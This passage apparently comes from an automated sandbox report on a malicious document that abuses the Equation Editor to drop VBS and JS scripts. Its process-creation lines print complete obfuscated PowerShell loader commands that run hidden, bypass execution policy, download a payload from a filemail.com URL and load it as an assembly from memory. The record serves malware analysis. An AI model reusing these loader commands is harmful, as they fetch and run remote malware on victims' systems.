      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1832Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2956Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6934Jump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3620Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exe TID: 3804Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exe TID: 3856Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4000Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3944Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4020Thread sleep count: 2956 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4020Thread sleep count: 6934 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4072Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4076Thread sleep time: -11068046444225724s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4076Thread sleep time: -3600000s >= -30000sJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3248Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
      Source: wscript.exe, 00000006.00000003.488124911.0000000003491000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fso.CopyFile(appDirs[i] + "\\VMware\\*.dmp", lethro + "\\Dumps\\");
      Source: wscript.exe, 00000006.00000003.366867455.0000000002D14000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Global_Config\VMware Server\SSL@cNR
      Source: wscript.exe, 00000006.00000003.366867455.0000000002D14000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \VMware\*.dmp
      Source: wscript.exe, 00000006.00000003.488049704.0000000002D4D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \VMware\*.dmpn
      Source: wscript.exe, 00000006.00000003.488124911.0000000003491000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fso.DeleteFolder(lethro + "\\Global_Config\\VMware Server\\SSL");
      Source: wscript.exe, 00000006.00000003.488049704.0000000002D4D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: I@\Global_Config\VMware Server\SSLcNR
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 188.114.97.3 443Jump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeDomain query: paste.ee
      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4004, type: MEMORYSTR
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAgACgAIAAoAFsAUwB0AHIAaQBuAEcAXQAkAHYARQBSAEIAbwBTAGUAUAByAGUARgBFAHIAZQBOAGMAZQApAFsAMQAsADMAXQArACcAeAAnAC0AagBvAEkAbgAnACcAKQAoACgAJwBLADYAcABpAG0AYQBnAGUAVQByAGwAJwArACcAIAA9ACAAcwAnACsAJwBTAFgAaAB0AHQAcABzADoALwAnACsAJwAvADEAMAAxADcALgBmAGkAbABlAG0AYQBpAGwALgBjAG8AbQAnACsAJwAvAGEAcABpACcAKwAnAC8AZgBpAGwAZQAvAGcAZQB0AD8AZgBpAGwAZQBrAGUAeQAnACsAJwA9ADIAJwArACcAQQBhACcAKwAnAF8AYgBXAG8AOQBSAGUAdQA0ADUAdAA3AEIAVQAxAGsAVgBnAHMAZAA5ACcAKwAnAHAAVAA5AHAAJwArACcAZwBTAFMAbAB2AFMAdABHAHIAbgBUAEkAJwArACcAQwBmAEYAaABtAFQASwBqACcAKwAnADMATABDADYAUwBRAHQASQBjAE8AYwBfAFQAMwA1AHcAJgBwAGsAXwB2AGkAZAA9AGYAZAA0AGYANgAxADQAYgBiADIAMAA5AGMANgAyAGMAMQA3ADMAMAA5ADQANQAxADcANgBhADAAOQAwADQAZgAgAHMAUwBYADsASwA2AHAAdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDACcAKwAnAGwAaQBlAG4AdAA7AEsANgBwAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAASwA2AHAAdwBlACcAKwAnAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhACcAKwAnAGQARABhAHQAYQAoAEsANgBwAGkAbQBhAGcAZQBVAHIAbAApADsASwA2AHAAaQBtAGEAZwBlAFQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgASwA2AHAAaQBtAGEAZwBlAEIAeQB0AGUAcwApADsASwA2AHAAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAcwBTAFgAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgBzAFMAWAA7AEsANgBwAGUAbgBkAEYAbABhAGcAIAA9ACAAcwAnACsAJwBTAFgAPAA8AEIAQQBTAEUANgA0AF8ARQAnACsAJwBOAEQAPgA+AHMAUwBYADsASwA2AHAAcwB0AGEAcgAnACsAJwB0AEkAbgBkAGUAeAAgAD0AIABLADYAcABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKABLADYAcABzAHQAYQByAHQARgBsAGEAZwApADsASwA2AHAAZQBuAGQASQBuAGQAZQB4ACAAPQAgAEsANgBwAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoAEsANgBwAGUAbgBkAEYAbABhAGcAKQA7AEsAJwArACcANgBwAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAASwA2AHAAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAJwArACcAIABLADYAcABzAHQAYQByAHQASQBuAGQAZQB4ADsASwA2AHAAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgAEsANgBwAHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwBLADYAcABiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIABLADYAcABlAG4AZABJAG4AZABlAHgAIAAtACAASwA2AHAAcwB0AGEAcgB0AEkAbgBkAGUAeAA7AEsANgBwAGIAYQBzAGUANgAnACsAJwA0AEMAbwBtAG0AYQBuAGQAIAA9ACAASwA2AHAAaQBtAGEAZwBlACcAKwAnAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoAEsANgBwAHMAdABhAHIAdABJAG4AZABlAHgALAAgAEsANgBwAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwBLADYAcABiAGEAcwBlADYANABSAGUAdgBlAHIAcwBlAGQAIAA9ACAALQBqAG8AaQBuACAAKABLADYAcABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkAC4AVABvAEMAaABhAHIAQQByAHIAJwArACcAYQB5ACgAKQAgACcAKwAnAGgATgBMACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgAEsANgBwAF8AIAB9ACkAWwAtADEAJwArACcALgAuAC0AKABLADYAcABiAGEAcwBlADYANABDAG8AbQAnACsAJwBtAGEAbgBkAC4ATABlAG4AZwB0AGgAKQBdADsASwA2AHAAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAEsANgBwAGIAYQBzAGUANgA0AFIAZQB2AGUAcgAnACsAJwBzAGUAZAApADsASwA2AHAAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AH
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\gdfgcvbi.vbs" Jump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\gDHxsqtDodRnltJFOd.js" Jump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAgACgAIAAoAFsAUwB0AHIAaQBuAEcAXQAkAHYARQBSAEIAbwBTAGUAUAByAGUARgBFAHIAZQBOAGMAZQApAFsAMQAsADMAXQArACcAeAAnAC0AagBvAEkAbgAnACcAKQAoACgAJwBLADYAcABpAG0AYQBnAGUAVQByAGwAJwArACcAIAA9ACAAcwAnACsAJwBTAFgAaAB0AHQAcABzADoALwAnACsAJwAvADEAMAAxADcALgBmAGkAbABlAG0AYQBpAGwALgBjAG8AbQAnACsAJwAvAGEAcABpACcAKwAnAC8AZgBpAGwAZQAvAGcAZQB0AD8AZgBpAGwAZQBrAGUAeQAnACsAJwA9ADIAJwArACcAQQBhACcAKwAnAF8AYgBXAG8AOQBSAGUAdQA0ADUAdAA3AEIAVQAxAGsAVgBnAHMAZAA5ACcAKwAnAHAAVAA5AHAAJwArACcAZwBTAFMAbAB2AFMAdABHAHIAbgBUAEkAJwArACcAQwBmAEYAaABtAFQASwBqACcAKwAnADMATABDADYAUwBRAHQASQBjAE8AYwBfAFQAMwA1AHcAJgBwAGsAXwB2AGkAZAA9AGYAZAA0AGYANgAxADQAYgBiADIAMAA5AGMANgAyAGMAMQA3ADMAMAA5ADQANQAxADcANgBhADAAOQAwADQAZgAgAHMAUwBYADsASwA2AHAAdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDACcAKwAnAGwAaQBlAG4AdAA7AEsANgBwAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAASwA2AHAAdwBlACcAKwAnAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhACcAKwAnAGQARABhAHQAYQAoAEsANgBwAGkAbQBhAGcAZQBVAHIAbAApADsASwA2AHAAaQBtAGEAZwBlAFQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgASwA2AHAAaQBtAGEAZwBlAEIAeQB0AGUAcwApADsASwA2AHAAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAcwBTAFgAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgBzAFMAWAA7AEsANgBwAGUAbgBkAEYAbABhAGcAIAA9ACAAcwAnACsAJwBTAFgAPAA8AEIAQQBTAEUANgA0AF8ARQAnACsAJwBOAEQAPgA+AHMAUwBYADsASwA2AHAAcwB0AGEAcgAnACsAJwB0AEkAbgBkAGUAeAAgAD0AIABLADYAcABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKABLADYAcABzAHQAYQByAHQARgBsAGEAZwApADsASwA2AHAAZQBuAGQASQBuAGQAZQB4ACAAPQAgAEsANgBwAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoAEsANgBwAGUAbgBkAEYAbABhAGcAKQA7AEsAJwArACcANgBwAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAASwA2AHAAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAJwArACcAIABLADYAcABzAHQAYQByAHQASQBuAGQAZQB4ADsASwA2AHAAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgAEsANgBwAHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwBLADYAcABiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIABLADYAcABlAG4AZABJAG4AZABlAHgAIAAtACAASwA2AHAAcwB0AGEAcgB0AEkAbgBkAGUAeAA7AEsANgBwAGIAYQBzAGUANgAnACsAJwA0AEMAbwBtAG0AYQBuAGQAIAA9ACAASwA2AHAAaQBtAGEAZwBlACcAKwAnAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoAEsANgBwAHMAdABhAHIAdABJAG4AZABlAHgALAAgAEsANgBwAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwBLADYAcABiAGEAcwBlADYANABSAGUAdgBlAHIAcwBlAGQAIAA9ACAALQBqAG8AaQBuACAAKABLADYAcABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkAC4AVABvAEMAaABhAHIAQQByAHIAJwArACcAYQB5ACgAKQAgACcAKwAnAGgATgBMACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgAEsANgBwAF8AIAB9ACkAWwAtADEAJwArACcALgAuAC0AKABLADYAcABiAGEAcwBlADYANABDAG8AbQAnACsAJwBtAGEAbgBkAC4ATABlAG4AZwB0AGgAKQBdADsASwA2AHAAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAEsANgBwAGIAYQBzAGUANgA0AFIAZQB2AGUAcgAnACsAJwBzAGUAZAApADsASwA2AHAAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([StrinG]$vERBoSePreFEreNce)[1,3]+'x'-joIn'')(('K6pimageUrl'+' = s'+'SXhttps:/'+'/1017.filemail.com'+'/api'+'/file/get?filekey'+'=2'+'Aa'+'_bWo9Reu45t7BU1kVgsd9'+'pT9p'+'gSSlvStGrnTI'+'CfFhmTKj'+'3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f sSX;K6pwebClient = New-Object System.Net.WebC'+'lient;K6pimageBytes = K6pwe'+'bClient.Downloa'+'dData(K6pimageUrl);K6pimageText = [System.Text.Encoding]::UTF8.GetString(K6pimageBytes);K6pstartFlag = sSX<<BASE64_START>>sSX;K6pendFlag = s'+'SX<<BASE64_E'+'ND>>sSX;K6pstar'+'tIndex = K6pimageText.IndexOf(K6pstartFlag);K6pendIndex = K6pimageText.IndexOf(K6pendFlag);K'+'6pstartIndex -ge 0 -and K6pendIndex -gt'+' K6pstartIndex;K6pstartIndex += K6pstartFlag.Length;K6pbase64Length = K6pendIndex - K6pstartIndex;K6pbase6'+'4Command = K6pimage'+'Text.Substring(K6pstartIndex, K6pbase64Length);K6pbase64Reversed = -join (K6pbase64Command.ToCharArr'+'ay() '+'hNL ForEach-Object { K6p_ })[-1'+'..-(K6pbase64Com'+'mand.Length)];K6pcommandBytes = [System.Convert]::FromBase64String(K6pbase64Rever'+'sed);K6ploadedAssembly = [Sys'+'tem.Reflection.Assembly]::L'+'oad(K'+'6pcommandBytes);K6pvaiMethod = [dn'+'lib.IO.Home].GetM'+'ethod(sSXVAIsSX);K6pvaiMethod.In'+'vok'+'e(K6pnul'+'l, @(sSXtxt.LSSWS/klo/ue.hsupwsrellor.sup//:ptthsSX, sSXdesativadosSX, sSXdesativadosSX, sSXdesat'+'ivadosSX, sSXdesativ'+'adosSX, sSX1sSX, sSXOneDriveSetupsSX,sSXdesativadosSX, sSXdesativadosSX,sSXdesativadosSX'+',sSXd'+'esativadosSX,sSXdesativadosSX,sSX1sSX,sSXdes'+'ativadosSX));').rEPLAce('K6p',[StrING][ChaR]36).rEPLAce('hNL','|').rEPLAce(([ChaR]115+[ChaR]83+[ChaR]88),[StrING][ChaR]39) )"Jump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'lgagacgaiaaoafsauwb0ahiaaqbuaecaxqakahyarqbsaeiabwbtaguauabyaguargbfahiazqboagmazqapafsamqasadmaxqaraccaeaanac0aagbvaekabganaccakqaoacgajwbladyacabpag0ayqbnaguavqbyagwajwaraccaiaa9acaacwanacsajwbtafgaaab0ahqacabzadoalwanacsajwavadeamaaxadcalgbmagkabablag0ayqbpagwalgbjag8abqanacsajwavageacabpaccakwanac8azgbpagwazqavagcazqb0ad8azgbpagwazqbraguaeqanacsajwa9adiajwaraccaqqbhaccakwanaf8aygbxag8aoqbsaguadqa0aduadaa3aeiavqaxagsavgbnahmazaa5accakwanahaavaa5ahaajwaraccazwbtafmabab2afmadabhahiabgbuaekajwaraccaqwbmaeyaaabtafqaswbqaccakwanadmatabdadyauwbrahqasqbjae8aywbfafqamwa1ahcajgbwagsaxwb2agkazaa9agyazaa0agyangaxadqaygbiadiamaa5agmangayagmamqa3admamaa5adqanqaxadcangbhadaaoqawadqazgagahmauwbyadsaswa2ahaadwblagiaqwbsagkazqbuahqaiaa9acaatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4atgblahqalgbxaguaygbdaccakwanagwaaqblag4adaa7aesangbwagkabqbhagcazqbcahkadablahmaiaa9acaaswa2ahaadwblaccakwanagiaqwbsagkazqbuahqalgbeag8adwbuagwabwbhaccakwanagqarabhahqayqaoaesangbwagkabqbhagcazqbvahiabaapadsaswa2ahaaaqbtageazwblafqazqb4ahqaiaa9acaawwbtahkacwb0aguabqauafqazqb4ahqalgbfag4aywbvagqaaqbuagcaxqa6adoavqbuaeyaoaauaecazqb0afmadabyagkabgbnacgaswa2ahaaaqbtageazwblaeiaeqb0aguacwapadsaswa2ahaacwb0ageacgb0aeyababhagcaiaa9acaacwbtafgapaa8aeiaqqbtaeuanga0af8auwbuaeeaugbuad4apgbzafmawaa7aesangbwaguabgbkaeyababhagcaiaa9acaacwanacsajwbtafgapaa8aeiaqqbtaeuanga0af8arqanacsajwboaeqapga+ahmauwbyadsaswa2ahaacwb0ageacganacsajwb0aekabgbkaguaeaagad0aiabladyacabpag0ayqbnaguavablahgadaauaekabgbkaguaeabpagyakabladyacabzahqayqbyahqargbsageazwapadsaswa2ahaazqbuagqasqbuagqazqb4acaapqagaesangbwagkabqbhagcazqbuaguaeab0ac4asqbuagqazqb4ae8azgaoaesangbwaguabgbkaeyababhagcakqa7aesajwaraccangbwahmadabhahiadabjag4azablahgaiaatagcazqagadaaiaatageabgbkacaaswa2ahaazqbuagqasqbuagqazqb4acaalqbnahqajwaraccaiabladyacabzahqayqbyahqasqbuagqazqb4adsaswa2ahaacwb0ageacgb0aekabgbkaguaeaagacsapqagaesangbwahmadabhahiadabgagwayqbnac4atablag4azwb0aggaowbladyacabiageacwbladyanabmaguabgbnahqaaaagad0aiabladyacablag4azabjag4azablahgaiaatacaaswa2ahaacwb0ageacgb0aekabgbkaguaeaa7aesangbwagiayqbzaguanganacsajwa0aemabwbtag0ayqbuagqaiaa9acaaswa2ahaaaqbtageazwblaccakwanafqazqb4ahqalgbtahuaygbzahqacgbpag4azwaoaesangbwahmadabhahiadabjag4azablahgalaagaesangbwagiayqbzaguanga0aewazqbuagcadaboackaowbladyacabiageacwbladyanabsaguadgblahiacwblagqaiaa9acaalqbqag8aaqbuacaakabladyacabiageacwbladyanabdag8abqbtageabgbkac4avabvaemaaabhahiaqqbyahiajwaraccayqb5acgakqagaccakwanaggatgbmacaargbvahiarqbhagmaaaatae8aygbqaguaywb0acaaewagaesangbwaf8aiab9ackawwatadeajwaraccalgauac0akabladyacabiageacwbladyanabdag8abqanacsajwbtageabgbkac4atablag4azwb0aggakqbdadsaswa2ahaaywbvag0abqbhag4azabcahkadablahmaiaa9acaawwbtahkacwb0aguabqauaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoaesangbwagiayqbzaguanga0afiazqb2aguacganacsajwbzaguazaapadsaswa2ahaababvageazablagqaqqbzahmazqbtagiabab5acaapqagafsauwb5ah
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ". ( ([string]$verbosepreference)[1,3]+'x'-join'')(('k6pimageurl'+' = s'+'sxhttps:/'+'/1017.filemail.com'+'/api'+'/file/get?filekey'+'=2'+'aa'+'_bwo9reu45t7bu1kvgsd9'+'pt9p'+'gsslvstgrnti'+'cffhmtkj'+'3lc6sqticoc_t35w&pk_vid=fd4f614bb209c62c1730945176a0904f ssx;k6pwebclient = new-object system.net.webc'+'lient;k6pimagebytes = k6pwe'+'bclient.downloa'+'ddata(k6pimageurl);k6pimagetext = [system.text.encoding]::utf8.getstring(k6pimagebytes);k6pstartflag = ssx<<base64_start>>ssx;k6pendflag = s'+'sx<<base64_e'+'nd>>ssx;k6pstar'+'tindex = k6pimagetext.indexof(k6pstartflag);k6pendindex = k6pimagetext.indexof(k6pendflag);k'+'6pstartindex -ge 0 -and k6pendindex -gt'+' k6pstartindex;k6pstartindex += k6pstartflag.length;k6pbase64length = k6pendindex - k6pstartindex;k6pbase6'+'4command = k6pimage'+'text.substring(k6pstartindex, k6pbase64length);k6pbase64reversed = -join (k6pbase64command.tochararr'+'ay() '+'hnl foreach-object { k6p_ })[-1'+'..-(k6pbase64com'+'mand.length)];k6pcommandbytes = [system.convert]::frombase64string(k6pbase64rever'+'sed);k6ploadedassembly = [sys'+'tem.reflection.assembly]::l'+'oad(k'+'6pcommandbytes);k6pvaimethod = [dn'+'lib.io.home].getm'+'ethod(ssxvaissx);k6pvaimethod.in'+'vok'+'e(k6pnul'+'l, 